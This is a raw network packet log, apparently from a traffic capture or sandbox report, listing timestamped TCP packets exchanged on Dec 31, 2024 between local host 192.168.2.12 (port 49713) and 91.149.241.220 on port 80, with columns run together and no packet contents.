                                      Dec 31, 2024 09:45:37.725775957 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.725785971 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.725796938 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.725812912 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.725852013 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.725879908 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.725898027 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.725908041 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.725944042 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.725953102 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.725955009 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.726005077 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.730678082 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.730735064 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.730777025 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.730793953 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.730822086 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.730823040 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.730833054 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.730865955 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.730993032 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.731003046 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.731103897 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.778944016 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.779155970 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.830981970 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.831094027 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.878985882 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.879111052 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.926963091 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.927050114 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:37.975001097 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:37.975119114 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.022964954 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.023045063 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.070997953 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.071059942 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.120145082 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.120328903 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.152786016 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.152987003 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.157896042 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.157921076 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.157951117 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.157996893 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.158057928 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158063889 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158113003 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.158159971 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158176899 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158236027 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.158335924 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158340931 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158375978 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158380032 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158385038 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.158389091 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158394098 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158406019 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158428907 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.158447981 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.158457994 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158463955 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.158498049 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158502102 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158509970 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158540010 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.158545017 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158557892 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158587933 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158603907 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158675909 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158715010 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158719063 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158735991 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158759117 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158803940 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158876896 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158900023 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.158907890 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.158962965 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.162769079 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.162782907 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.162832975 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.162849903 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.162961960 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.162967920 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163033962 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.163045883 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163110018 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163280010 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163417101 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163511038 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163574934 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163578987 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163583040 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163611889 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163615942 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163671970 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163676023 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163749933 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163753986 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163804054 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163834095 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163903952 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163957119 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.163960934 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164019108 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164027929 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164082050 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164089918 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164134979 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164139986 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164206028 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164210081 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164283037 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164284945 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.164287090 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164297104 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164299965 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164309025 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164313078 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164352894 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.164366961 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164371014 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164378881 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164391041 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164400101 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164406061 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164438963 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164442062 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164462090 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164465904 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164505005 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164515018 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164540052 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164544106 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164555073 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164585114 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164606094 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164735079 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164740086 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164743900 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164747000 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164751053 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164753914 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164762974 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164808035 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164812088 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164819002 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164822102 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164825916 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164829016 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.164838076 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167627096 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167813063 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167849064 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167881012 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167927980 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167932034 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.167967081 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.168020010 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169116974 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169153929 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169267893 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169279099 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169363022 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169372082 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169384003 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169388056 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169413090 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169416904 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169437885 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.169492960 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169497967 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169503927 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.169531107 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169534922 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169560909 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169564962 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169676065 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169680119 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169696093 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169702053 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169717073 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169761896 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169765949 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169775009 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169800997 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169805050 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169871092 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169874907 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169884920 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169889927 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169934988 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169994116 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.169998884 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170042038 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170056105 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170125008 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170130014 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170188904 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170192957 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170247078 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170250893 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170295000 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170299053 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170341969 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170345068 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170413971 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170418978 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170435905 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170473099 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170485973 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170527935 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170578003 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.170582056 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174289942 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174294949 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174345016 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174350023 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174396992 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174401045 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174457073 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174460888 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174503088 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174508095 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174588919 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174592018 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.174593925 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174638987 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174643040 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174652100 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.174688101 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174691916 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174766064 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174770117 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174793005 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174796104 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174855947 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174860001 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174892902 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174918890 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174962997 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.174967051 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175013065 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175017118 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175075054 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175079107 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175124884 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175129890 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175173998 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175178051 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175226927 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175230980 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175276041 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175281048 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175342083 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175347090 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175359011 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175384045 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175388098 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175396919 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175440073 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175443888 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175462008 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175466061 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175519943 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175530910 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175542116 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175545931 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.175596952 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179439068 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179444075 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179486036 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179490089 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179529905 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179533958 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179582119 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179637909 CET4971380192.168.2.1291.149.241.220
                                      Dec 31, 2024 09:45:38.179657936 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179662943 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179718018 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179722071 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179738045 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179781914 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179816961 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179860115 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179894924 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.179944038 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180006981 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180011034 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180052996 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180057049 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180110931 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180114985 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180151939 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180181980 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180238962 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180243015 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180265903 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180269957 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180320024 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180325031 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180373907 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180377960 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180409908 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180413961 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180424929 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180490017 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180494070 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180531979 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180536985 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180562973 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180567026 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180583954 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180588007 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180640936 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180645943 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180675030 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180680037 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180691957 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180695057 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180753946 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180757999 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.180769920 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184411049 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184504032 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184506893 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184552908 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184557915 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184626102 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184629917 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184678078 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184683084 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184737921 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184741974 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184782982 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184825897 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184878111 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184885979 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184923887 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184928894 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184968948 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.184973955 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185007095 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185010910 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185054064 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185058117 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185131073 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185141087 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185147047 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185151100 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185198069 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185203075 CET804971391.149.241.220192.168.2.12
                                      Dec 31, 2024 09:45:38.185256958 CET804971391.149.241.220192.168.2.12
